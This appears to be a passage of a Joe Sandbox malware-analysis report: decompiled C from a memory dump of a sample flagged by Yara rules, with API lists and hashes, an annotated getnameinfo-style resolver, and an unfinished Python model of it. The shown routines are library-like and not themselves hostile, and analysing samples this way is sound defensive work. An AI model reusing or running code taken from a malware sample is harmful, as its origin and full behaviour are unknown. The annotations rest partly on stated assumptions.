                                                                      								_t237 = E0044EBE5(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
                                                                      								_t238 = _t237 | E0044EBE5(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                                                                      								_t239 = _t238 | E0044EBE5(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                                                                      								_t240 = _t239 | E0044EBE5(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                                                                      								_v20 = _v8 + 0x1c;
                                                                      								_t241 = _t240 | E0044EBE5(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                                                                      								_t242 = _t241 | E0044EBE5(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                                                                      								_t243 = _t242 | E0044EBE5(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                                                                      								_t244 = _t243 | E0044EBE5(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                                                                      								_t245 = _t244 | E0044EBE5(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                                                                      								_t246 = _t245 | E0044EBE5(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                                                                      								_t247 = _t246 | E0044EBE5(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                                                                      								_t248 = _t247 | E0044EBE5(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                                                                      								_t249 = _t248 | E0044EBE5(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                                                                      								_t250 = _t249 | E0044EBE5(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                                                                      								_t251 = _t250 | E0044EBE5(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                                                                      								_t252 = _t251 | E0044EBE5(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                                                                      								_t253 = _t252 | E0044EBE5(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                                                                      								_t254 = _t253 | E0044EBE5(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                                                                      								_t255 = _t254 | E0044EBE5(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                                                                      								_t256 = _t255 | E0044EBE5(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                                                                      								if((E0044EBE5(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                                                                      									_t226 =  *_v20;
                                                                      									while( *_t226 != 0) {
                                                                      										_t195 =  *_t226;
                                                                      										if(_t195 < 0x30 || _t195 > 0x39) {
                                                                      											if(_t195 != 0x3b) {
                                                                      												goto L17;
                                                                      											}
                                                                      											_t257 = _t226;
                                                                      											do {
                                                                      												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                                                                      												_t257 = _t257 + 1;
                                                                      											} while ( *_t257 != 0);
                                                                      										} else {
                                                                      											 *_t226 = _t195 - 0x30;
                                                                      											L17:
                                                                      											_t226 = _t226 + 1;
                                                                      										}
                                                                      									}
                                                                      									goto L25;
                                                                      								}
                                                                      								E0044C273(_v8);
                                                                      								E004427C2(_v8);
                                                                      								E004427C2(_v12);
                                                                      								E004427C2(_v16);
                                                                      								goto L4;
                                                                      							}
                                                                      							E004427C2(_t234);
                                                                      							E004427C2(_v12);
                                                                      							L7:
                                                                      							goto L4;
                                                                      						}
                                                                      						E004427C2(_t234);
                                                                      						goto L7;
                                                                      					}
                                                                      					L4:
                                                                      					return 1;
                                                                      				} else {
                                                                      					_t231 = 0;
                                                                      					_v12 = 0;
                                                                      					_t236 = 0x46c178;
                                                                      					L27:
                                                                      					_t105 =  *(_t210 + 0x84);
                                                                      					if(_t105 != 0) {
                                                                      						asm("lock dec dword [eax]");
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                                                                      						asm("lock xadd [ecx], eax");
                                                                      						if((_t105 | 0xffffffff) == 0) {
                                                                      							E004427C2( *(_t210 + 0x88));
                                                                      							E004427C2( *((intOrPtr*)(_t210 + 0x7c)));
                                                                      						}
                                                                      					}
                                                                      					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                                                                      					 *(_t210 + 0x84) = _t231;
                                                                      					 *(_t210 + 0x88) = _t236;
                                                                      					return 0;
                                                                      				}
                                                                      			}
                                                                      0x0044c63d
                                                                      0x0044c646
                                                                      0x00000000
                                                                      0x0044c64b
                                                                      0x0044c41c
                                                                      0x0044c425
                                                                      0x0044c3ef
                                                                      0x00000000
                                                                      0x0044c3ef
                                                                      0x0044c3ea
                                                                      0x00000000
                                                                      0x0044c3ea
                                                                      0x0044c3c5
                                                                      0x00000000
                                                                      0x0044c39a
                                                                      0x0044c39a
                                                                      0x0044c39c
                                                                      0x0044c39f
                                                                      0x0044c6e0
                                                                      0x0044c6e0
                                                                      0x0044c6e8
                                                                      0x0044c6ea
                                                                      0x0044c6ea
                                                                      0x0044c6f2
                                                                      0x0044c6f7
                                                                      0x0044c6fb
                                                                      0x0044c703
                                                                      0x0044c70b
                                                                      0x0044c711
                                                                      0x0044c6fb
                                                                      0x0044c715
                                                                      0x0044c71a
                                                                      0x0044c720
                                                                      0x00000000
                                                                      0x0044c720

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: bf17aadf7d0b1454e51f6f2e82ae52b9e5c7dada269d22980b5cbc534f11bae7
                                                                      • Instruction ID: 2aaa2d3f0cfef8b1f8f058454d09b4c7c5dd551ea9896ea5cb60de1f9d18f11e
                                                                      • Opcode Fuzzy Hash: bf17aadf7d0b1454e51f6f2e82ae52b9e5c7dada269d22980b5cbc534f11bae7
                                                                      • Instruction Fuzzy Hash: ADC16972E41204AFFB60DBA9CC82FEE77F8EB08704F144556FA05FB282D574A9418764
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 41%
                                                                      			E0045194C(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                      				signed int _v5;
                                                                      				char _v6;
                                                                      				void* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				intOrPtr _v36;
                                                                      				signed int _v44;
                                                                      				void _v48;
                                                                      				char _v72;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t114;
                                                                      				signed int _t123;
                                                                      				signed char _t124;
                                                                      				signed int _t134;
                                                                      				intOrPtr _t164;
                                                                      				intOrPtr _t180;
                                                                      				signed int* _t190;
                                                                      				signed int _t192;
                                                                      				char _t197;
                                                                      				signed int _t203;
                                                                      				signed int _t206;
                                                                      				signed int _t215;
                                                                      				signed int _t217;
                                                                      				signed int _t219;
                                                                      				signed int _t225;
                                                                      				signed int _t227;
                                                                      				signed int _t234;
                                                                      				signed int _t235;
                                                                      				signed int _t237;
                                                                      				signed int _t239;
                                                                      				signed char _t242;
                                                                      				intOrPtr _t245;
                                                                      				void* _t248;
                                                                      				void* _t252;
                                                                      				void* _t262;
                                                                      				signed int _t263;
                                                                      				signed int _t266;
                                                                      				signed int _t269;
                                                                      				signed int _t270;
                                                                      				void* _t272;
                                                                      				void* _t274;
                                                                      				void* _t275;
                                                                      				void* _t277;
                                                                      				void* _t278;
                                                                      				void* _t280;
                                                                      				void* _t284;
                                                                      
                                                                      				_t262 = E004516AF(__ecx,  &_v72, _a16, _a20, _a24);
                                                                      				_t192 = 6;
                                                                      				memcpy( &_v48, _t262, _t192 << 2);
                                                                      				_t274 = _t272 + 0x1c;
                                                                      				_t248 = _t262 + _t192 + _t192;
                                                                      				_t263 = _t262 | 0xffffffff;
                                                                      				if(_v36 != _t263) {
                                                                      					_t114 = E0044C066(_t248, _t263, __eflags);
                                                                      					_t190 = _a8;
                                                                      					 *_t190 = _t114;
                                                                      					__eflags = _t114 - _t263;
                                                                      					if(_t114 != _t263) {
                                                                      						_v20 = _v20 & 0x00000000;
                                                                      						_v24 = 0xc;
                                                                      						_t275 = _t274 - 0x18;
                                                                      						 *_a4 = 1;
                                                                      						_push(6);
                                                                      						_v16 =  !(_a16 >> 7) & 1;
                                                                      						_push( &_v24);
                                                                      						_push(_a12);
                                                                      						memcpy(_t275,  &_v48, 1 << 2);
                                                                      						_t197 = 0;
                                                                      						_t252 = E0045161A();
                                                                      						_t277 = _t275 + 0x2c;
                                                                      						_v12 = _t252;
                                                                      						__eflags = _t252 - 0xffffffff;
                                                                      						if(_t252 != 0xffffffff) {
                                                                      							L11:
                                                                      							_t123 = GetFileType(_t252);
                                                                      							__eflags = _t123;
                                                                      							if(_t123 != 0) {
                                                                      								__eflags = _t123 - 2;
                                                                      								if(_t123 != 2) {
                                                                      									__eflags = _t123 - 3;
                                                                      									_t124 = _v48;
                                                                      									if(_t123 == 3) {
                                                                      										_t124 = _t124 | 0x00000008;
                                                                      										__eflags = _t124;
                                                                      									}
                                                                      								} else {
                                                                      									_t124 = _v48 | 0x00000040;
                                                                      								}
                                                                      								_v5 = _t124;
                                                                      								E0044BFAF(_t197,  *_t190, _t252);
                                                                      								_t242 = _v5 | 0x00000001;
                                                                      								_v5 = _t242;
                                                                      								_v48 = _t242;
                                                                      								 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                                                                      								_t203 =  *_t190;
                                                                      								_t205 = (_t203 & 0x0000003f) * 0x30;
                                                                      								__eflags = _a16 & 0x00000002;
                                                                      								 *((char*)( *((intOrPtr*)(0x46d800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                                                                      								if((_a16 & 0x00000002) == 0) {
                                                                      									L20:
                                                                      									_v6 = 0;
                                                                      									_push( &_v6);
                                                                      									_push(_a16);
                                                                      									_t278 = _t277 - 0x18;
                                                                      									_t206 = 6;
                                                                      									_push( *_t190);
                                                                      									memcpy(_t278,  &_v48, _t206 << 2);
                                                                      									_t134 = E004513CD(_t190,  &_v48 + _t206 + _t206,  &_v48);
                                                                      									_t280 = _t278 + 0x30;
                                                                      									__eflags = _t134;
                                                                      									if(__eflags == 0) {
                                                                      										 *((char*)( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                                                                      										 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                                                                      										__eflags = _v5 & 0x00000048;
                                                                      										if((_v5 & 0x00000048) == 0) {
                                                                      											__eflags = _a16 & 0x00000008;
                                                                      											if((_a16 & 0x00000008) != 0) {
                                                                      												_t225 =  *_t190;
                                                                      												_t227 = (_t225 & 0x0000003f) * 0x30;
                                                                      												_t164 =  *((intOrPtr*)(0x46d800 + (_t225 >> 6) * 4));
                                                                      												_t87 = _t164 + _t227 + 0x28;
                                                                      												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                                                                      												__eflags =  *_t87;
                                                                      											}
                                                                      										}
                                                                      										_t266 = _v44;
                                                                      										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                                                                      										if((_t266 & 0xc0000000) != 0xc0000000) {
                                                                      											L31:
                                                                      											__eflags = 0;
                                                                      											return 0;
                                                                      										} else {
                                                                      											__eflags = _a16 & 0x00000001;
                                                                      											if((_a16 & 0x00000001) == 0) {
                                                                      												goto L31;
                                                                      											}
                                                                      											CloseHandle(_v12);
                                                                      											_v44 = _t266 & 0x7fffffff;
                                                                      											_t215 = 6;
                                                                      											_push( &_v24);
                                                                      											_push(_a12);
                                                                      											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                                                                      											_t245 = E0045161A();
                                                                      											__eflags = _t245 - 0xffffffff;
                                                                      											if(_t245 != 0xffffffff) {
                                                                      												_t217 =  *_t190;
                                                                      												_t219 = (_t217 & 0x0000003f) * 0x30;
                                                                      												__eflags = _t219;
                                                                      												 *((intOrPtr*)( *((intOrPtr*)(0x46d800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                                                                      												goto L31;
                                                                      											}
                                                                      											E0043990B(GetLastError());
                                                                      											 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                                      											E0044C178( *_t190);
                                                                      											L10:
                                                                      											goto L2;
                                                                      										}
                                                                      									}
                                                                      									_t269 = _t134;
                                                                      									goto L22;
                                                                      								} else {
                                                                      									_t269 = E0045182B(_t205,  *_t190);
                                                                      									__eflags = _t269;
                                                                      									if(__eflags != 0) {
                                                                      										L22:
                                                                      										E00446C18(__eflags,  *_t190);
                                                                      										return _t269;
                                                                      									}
                                                                      									goto L20;
                                                                      								}
                                                                      							}
                                                                      							_t270 = GetLastError();
                                                                      							E0043990B(_t270);
                                                                      							 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                                      							CloseHandle(_t252);
                                                                      							__eflags = _t270;
                                                                      							if(_t270 == 0) {
                                                                      								 *((intOrPtr*)(E00439941())) = 0xd;
                                                                      							}
                                                                      							goto L2;
                                                                      						}
                                                                      						_t234 = _v44;
                                                                      						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                                                                      						if((_t234 & 0xc0000000) != 0xc0000000) {
                                                                      							L9:
                                                                      							_t235 =  *_t190;
                                                                      							_t237 = (_t235 & 0x0000003f) * 0x30;
                                                                      							_t180 =  *((intOrPtr*)(0x46d800 + (_t235 >> 6) * 4));
                                                                      							_t33 = _t180 + _t237 + 0x28;
                                                                      							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                                                                      							__eflags =  *_t33;
                                                                      							E0043990B(GetLastError());
                                                                      							goto L10;
                                                                      						}
                                                                      						__eflags = _a16 & 0x00000001;
                                                                      						if((_a16 & 0x00000001) == 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						_t284 = _t277 - 0x18;
                                                                      						_v44 = _t234 & 0x7fffffff;
                                                                      						_t239 = 6;
                                                                      						_push( &_v24);
                                                                      						_push(_a12);
                                                                      						memcpy(_t284,  &_v48, _t239 << 2);
                                                                      						_t197 = 0;
                                                                      						_t252 = E0045161A();
                                                                      						_t277 = _t284 + 0x2c;
                                                                      						_v12 = _t252;
                                                                      						__eflags = _t252 - 0xffffffff;
                                                                      						if(_t252 != 0xffffffff) {
                                                                      							goto L11;
                                                                      						}
                                                                      						goto L9;
                                                                      					} else {
                                                                      						 *(E0043992E()) =  *_t186 & 0x00000000;
                                                                      						 *_t190 = _t263;
                                                                      						 *((intOrPtr*)(E00439941())) = 0x18;
                                                                      						goto L2;
                                                                      					}
                                                                      				} else {
                                                                      					 *(E0043992E()) =  *_t188 & 0x00000000;
                                                                      					 *_a8 = _t263;
                                                                      					L2:
                                                                      					return  *((intOrPtr*)(E00439941()));
                                                                      				}
                                                                      			}

(Instruction address column for E0045194C, 0x0045196f through 0x00451b07; the instruction text for these addresses was not extracted.)
                                                                      0x00451b0b
                                                                      0x00451b15
                                                                      0x00451b18
                                                                      0x00451b23
                                                                      0x00451b28
                                                                      0x00451b38
                                                                      0x00451b3b
                                                                      0x00451b3f
                                                                      0x00451b40
                                                                      0x00451b46
                                                                      0x00451b4b
                                                                      0x00451b4e
                                                                      0x00451b50
                                                                      0x00451b52
                                                                      0x00451b57
                                                                      0x00451b5a
                                                                      0x00451b5c
                                                                      0x00451b86
                                                                      0x00451baa
                                                                      0x00451bae
                                                                      0x00451bb2
                                                                      0x00451bb4
                                                                      0x00451bb8
                                                                      0x00451bba
                                                                      0x00451bc4
                                                                      0x00451bc7
                                                                      0x00451bce
                                                                      0x00451bce
                                                                      0x00451bce
                                                                      0x00451bce
                                                                      0x00451bb8
                                                                      0x00451bd3
                                                                      0x00451bdf
                                                                      0x00451be1
                                                                      0x00451c6c
                                                                      0x00451c6c
                                                                      0x00000000
                                                                      0x00451be7
                                                                      0x00451be7
                                                                      0x00451beb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00451bf0
                                                                      0x00451c02
                                                                      0x00451c0a
                                                                      0x00451c0d
                                                                      0x00451c0e
                                                                      0x00451c11
                                                                      0x00451c18
                                                                      0x00451c1d
                                                                      0x00451c20
                                                                      0x00451c54
                                                                      0x00451c5e
                                                                      0x00451c5e
                                                                      0x00451c68
                                                                      0x00000000
                                                                      0x00451c68
                                                                      0x00451c29
                                                                      0x00451c42
                                                                      0x00451c49
                                                                      0x00451a6c
                                                                      0x00000000
                                                                      0x00451a6c
                                                                      0x00451be1
                                                                      0x00451b5e
                                                                      0x00000000
                                                                      0x00451b2a
                                                                      0x00451b31
                                                                      0x00451b34
                                                                      0x00451b36
                                                                      0x00451b60
                                                                      0x00451b62
                                                                      0x00000000
                                                                      0x00451b68
                                                                      0x00000000
                                                                      0x00451b36
                                                                      0x00451b28
                                                                      0x00451a83
                                                                      0x00451a86
                                                                      0x00451aa1
                                                                      0x00451aa6
                                                                      0x00451aac
                                                                      0x00451aae
                                                                      0x00451ab9
                                                                      0x00451ab9
                                                                      0x00000000
                                                                      0x00451aae
                                                                      0x00451a07
                                                                      0x00451a0e
                                                                      0x00451a10
                                                                      0x00451a47
                                                                      0x00451a47
                                                                      0x00451a51
                                                                      0x00451a54
                                                                      0x00451a5b
                                                                      0x00451a5b
                                                                      0x00451a5b
                                                                      0x00451a67
                                                                      0x00000000
                                                                      0x00451a67
                                                                      0x00451a12
                                                                      0x00451a16
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00451a18
                                                                      0x00451a27
                                                                      0x00451a2c
                                                                      0x00451a2f
                                                                      0x00451a30
                                                                      0x00451a33
                                                                      0x00451a33
                                                                      0x00451a3a
                                                                      0x00451a3c
                                                                      0x00451a3f
                                                                      0x00451a42
                                                                      0x00451a45
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004519a5
                                                                      0x004519aa
                                                                      0x004519ad
                                                                      0x004519b4
                                                                      0x00000000
                                                                      0x004519b4
                                                                      0x0045197e
                                                                      0x00451983
                                                                      0x00451989
                                                                      0x0045198b
                                                                      0x00000000
                                                                      0x00451990

                                                                      APIs
                                                                        • Part of subcall function 0045161A: CreateFileW.KERNEL32(00000000,00000000,?,004519F5,?,?,00000000,?,004519F5,00000000,0000000C), ref: 00451637
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00451A60
                                                                      • __dosmaperr.LIBCMT ref: 00451A67
                                                                      • GetFileType.KERNEL32(00000000), ref: 00451A73
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00451A7D
                                                                      • __dosmaperr.LIBCMT ref: 00451A86
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00451AA6
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00451BF0
                                                                      • GetLastError.KERNEL32 ref: 00451C22
                                                                      • __dosmaperr.LIBCMT ref: 00451C29
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: 5e1f6f77a6c07bd48e4a6e7957e7f351ec4a9a56cc103863395e372cee4a87c4
                                                                      • Instruction ID: 50b0640321c17c93fe2f0ffb3127ba91cff55095811ef4f5a979557d6023e441
                                                                      • Opcode Fuzzy Hash: 5e1f6f77a6c07bd48e4a6e7957e7f351ec4a9a56cc103863395e372cee4a87c4
                                                                      • Instruction Fuzzy Hash: 56A13732A141089FDF19AF68C8917AE7BA0DB06325F18015EFC11DF3A2D7798D16CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 38%
                                                                      			E00412189(char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
                                                                      				intOrPtr _v0;
                                                                      				short _v4;
                                                                      				char _v8;
                                                                      				char* _v12;
                                                                      				signed short _v20;
                                                                      				intOrPtr _v24;
                                                                      				char _t36;
                                                                      				short _t37;
                                                                      				intOrPtr* _t44;
                                                                      				void* _t47;
                                                                      				void* _t49;
                                                                      				char* _t52;
                                                                      				signed short* _t58;
                                                                      				signed char _t63;
                                                                      				intOrPtr _t64;
                                                                      				signed short _t69;
                                                                      				void* _t71;
                                                                      				void* _t72;
                                                                      				intOrPtr _t73;
                                                                      				intOrPtr* _t74;
                                                                      				intOrPtr _t76;
                                                                      				void* _t77;
                                                                      
                                                                      				_t77 =  &_v12;
                                                                      				_t36 =  *((intOrPtr*)("65535")); // 0x33353536: first 4 bytes of the literal "65535", the widest numeric port string, staged on the stack
                                                                      				_v8 = _t36;
                                                                      				_t37 =  *0x4671e8; // 0x35
                                                                      				_t74 = _a4;
                                                                      				_v4 = _t37;
                                                                      				_v12 =  &_v8;
                                                                      				if(_t74 == 0 || _a8 < 0x10) { // _a4 = sockaddr pointer, _a8 = its length; sizeof(sockaddr_in) == 0x10
                                                                      					L42:
                                                                      					return 0x2afb; // WSANO_RECOVERY (11003)
                                                                      				} else {
                                                                      					_t71 = 2;
                                                                      					if( *_t74 != _t71) { // sin_family must be AF_INET (2)
                                                                      						return 0x273f; // WSAEAFNOSUPPORT (10047)
                                                                      					}
                                                                      					_t76 = _a24; // service buffer length
                                                                      					_t64 = _a20; // service buffer
                                                                      					_t73 = _a16; // host buffer length
                                                                      					if(_a12 == 0 || _t73 == 0) { // _a12 = host buffer
                                                                      						if(_t64 == 0 || _t76 == 0) { // neither a host nor a service buffer was supplied
                                                                      							return 0x2af9; // WSAHOST_NOT_FOUND (11001)
                                                                      						} else {
                                                                      							goto L8;
                                                                      						}
                                                                      					} else {
                                                                      						L8:
                                                                      						_t63 = _a28; // getnameinfo()-style flags word
                                                                      						_t42 = _t63 & 0x00000006;
                                                                      						if((_t63 & 0x00000006) != 6) { // NI_NUMERICHOST (0x02) combined with NI_NAMEREQD (0x04) is rejected at the end of this block
                                                                      							if(_t64 == 0 || _t76 == 0) {
                                                                      								L21:
                                                                      								if(_a12 == 0 || _t73 == 0) {
                                                                      									L40:
                                                                      									return 0;
                                                                      								} else {
                                                                      									_t44 =  *((intOrPtr*)(_t74 + 4));
                                                                      									_a4 = _t44;
                                                                      									if((_t63 & 0x00000002) == 0) { // not NI_NUMERICHOST: attempt a reverse lookup first
                                                                      										_t44 =  &_a4;
                                                                      										__imp__#51(_t44, 4, _t71); // ws2_32 ordinal #51: gethostbyaddr(&sin_addr, 4, AF_INET)
                                                                      										if(_t44 == 0) {
                                                                      											L30:
                                                                      											if((_t63 & 0x00000004) == 0) { // no NI_NAMEREQD: fall back to the numeric form
                                                                      												_push(_v8);
                                                                      												L37:
                                                                      												__imp__#12(); // ws2_32 ordinal #12: inet_ntoa
                                                                      												_t75 = _t44;
                                                                      												L38:
                                                                      												if(_t73 <= E004372D0(_t75)) { // E004372D0 is used as strlen; the buffer must also hold the terminator
                                                                      													goto L42;
                                                                      												}
                                                                      												E0043DAD7(_v4, _t73, _t75);
                                                                      												goto L40;
                                                                      											}
                                                                      											__imp__#111(); // ws2_32 ordinal #111: WSAGetLastError, switched on below relative to 0x2af9
                                                                      											_t47 = _t44 - 0x2af9;
                                                                      											if(_t47 == 0) {
                                                                      												L34:
                                                                      												return 0x2af9; // WSAHOST_NOT_FOUND; also the default for any unmapped resolver error
                                                                      											}
                                                                      											_t49 = _t47 - 1;
                                                                      											if(_t49 == 0) {
                                                                      												return 0x2afa; // WSATRY_AGAIN (11002)
                                                                      											}
                                                                      											if(_t49 == 1) {
                                                                      												goto L42; // WSANO_RECOVERY (11003)
                                                                      											}
                                                                      											goto L34;
                                                                      										}
                                                                      										_t75 =  *_t44;
                                                                      										if( *_t44 == 0) {
                                                                      											goto L30;
                                                                      										}
                                                                      										if((_t63 & 0x00000001) != 0) { // NI_NOFQDN: truncate the name at its first '.'
                                                                      											_t52 = L00411B21(_t75, 0x2e); // strchr-like lookup, 0x2e == '.'
                                                                      											if(_t52 != 0) {
                                                                      												 *_t52 = 0;
                                                                      											}
                                                                      										}
                                                                      										goto L38;
                                                                      									}
                                                                      									_push(_t44);
                                                                      									goto L37;
                                                                      								}
                                                                      							} else {
                                                                      								_t69 =  *(_t74 + 2) & 0x0000ffff; // sin_port, still in network byte order
                                                                      								_a8 = _t69;
                                                                      								if((_t63 & 0x00000008) == 0) { // not NI_NUMERICSERV: look the port up by name first
                                                                      									_t72 = 0;
                                                                      									_t54 =  ==  ? _t72 : "udp"; // the decompiler did not recover this condition; the protocol argument is either NULL or "udp"
                                                                      									_t42 = _t69 & 0x0000ffff;
                                                                      									__imp__#56(_t42,  ==  ? _t72 : "udp"); // ws2_32 ordinal #56: getservbyport(port, proto)
                                                                      									if(_t42 == 0) {
                                                                      										L17:
                                                                      										_push(_v0);
                                                                      										L18:
                                                                      										__imp__#15(); // ws2_32 ordinal #15: ntohs
                                                                      										E00411BAC( &_v20, 6, "%u", _t42 & 0x0000ffff); // snprintf-style: decimal port into a 6-byte buffer ("65535" plus terminator)
                                                                      										_t58 =  &_v20;
                                                                      										_t77 = _t77 + 0x10;
                                                                      										L19:
                                                                      										if(_t76 <= E004372D0(_t58)) {
                                                                      											goto L42;
                                                                      										}
                                                                      										E0043DAD7(_a8, _t76, _v24);
                                                                      										_t77 = _t77 + 0xc;
                                                                      										_t71 = 2;
                                                                      										goto L21;
                                                                      									}
                                                                      									_t42 =  *_t42;
                                                                      									if(_t42 == 0) {
                                                                      										goto L17;
                                                                      									}
                                                                      									_v20 = _t42;
                                                                      									goto L19;
                                                                      								}
                                                                      								_push(_t69);
                                                                      								goto L18;
                                                                      							}
                                                                      						}
                                                                      						return 0x2726; // WSAEINVAL (10022): NI_NUMERICHOST and NI_NAMEREQD both set
                                                                      					}
                                                                      				}
                                                                      			}
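By its structure, E00412189 is a getnameinfo-style resolver limited to AF_INET: the imports it calls are ws2_32 ordinals #51 (gethostbyaddr), #12 (inet_ntoa), #56 (getservbyport), #15 (ntohs) and #111 (WSAGetLastError), and its literal return values are Winsock error codes. The Python below is an added reference model of that control flow, written for this page; it is not code from the sample, from Joe Sandbox or from any library. It exists so an analyst can check a reading of the decompiled branches against concrete inputs and see which flag and buffer combinations produce which status. The resolver tables are constructed in memory (no network), the identification of E004372D0 as strlen and E0043DAD7 as a bounded string copy is inferred from how their results are used, and the choice of NI_DGRAM as the selector for the protocol argument is an assumption, because the decompiler dropped that ternary's condition.

```python
# Added reference model of E00412189 (not the sample's code): re-expresses the
# decompiled branches so the returned Winsock codes can be checked on real input.

# Winsock error codes that appear as literal return values in the listing.
WSAEINVAL = 0x2726          # 10022
WSAEAFNOSUPPORT = 0x273f    # 10047
WSAHOST_NOT_FOUND = 0x2af9  # 11001
WSATRY_AGAIN = 0x2afa       # 11002
WSANO_RECOVERY = 0x2afb     # 11003

# getnameinfo() flag bits tested against the flags argument (_a28).
NI_NOFQDN = 0x01
NI_NUMERICHOST = 0x02
NI_NAMEREQD = 0x04
NI_NUMERICSERV = 0x08
NI_DGRAM = 0x10
AF_INET = 2

# Constructed resolver tables (no network access). They stand in for ws2_32
# ordinal #51 gethostbyaddr and #56 getservbyport; a None name models a failed
# lookup whose WSAGetLastError (#111) value is the second tuple element.
HOSTS = {
    b"\x7f\x00\x00\x01": ("localhost.localdomain", 0),
    b"\x0a\x00\x00\x05": (None, WSATRY_AGAIN),
    b"\xc0\x00\x02\x01": (None, 0x2afc),   # WSANO_DATA: not one of the three mapped codes
}
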